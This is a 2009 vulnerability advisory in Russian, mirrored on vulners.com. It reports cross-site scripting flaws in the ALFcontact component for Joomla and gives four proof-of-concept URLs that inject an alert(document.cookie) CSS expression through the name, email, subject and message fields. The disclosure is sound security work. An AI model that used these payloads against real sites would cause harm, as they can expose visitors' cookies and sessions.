Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22412
HistorySep 04, 2009 - 12:00 a.m.

Cross-Site Scripting vulnerabilities in ALFcontact for Joomla

2009-09-0400:00:00
vulners.com
14

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в компоненте
ALFcontact (com_alfcontact) для Joomla.

XSS:

Возможна атака как через POST, так и GET запросы.

http://site/component/option,com_alfcontact/?name=%22%20style=%22xss:expression(alert(document.cookie))

http://site/component/option,com_alfcontact/?email=%22%20style=%22xss:expression(alert(document.cookie))

http://site/component/option,com_alfcontact/?subject=%22%20style=%22xss:expression(alert(document.cookie))

http://site/component/option,com_alfcontact/?message=%22%20style=%22xss:expression(alert(document.cookie))

Уязвимы ALFcontact 1.8, 1.9 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/3471/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua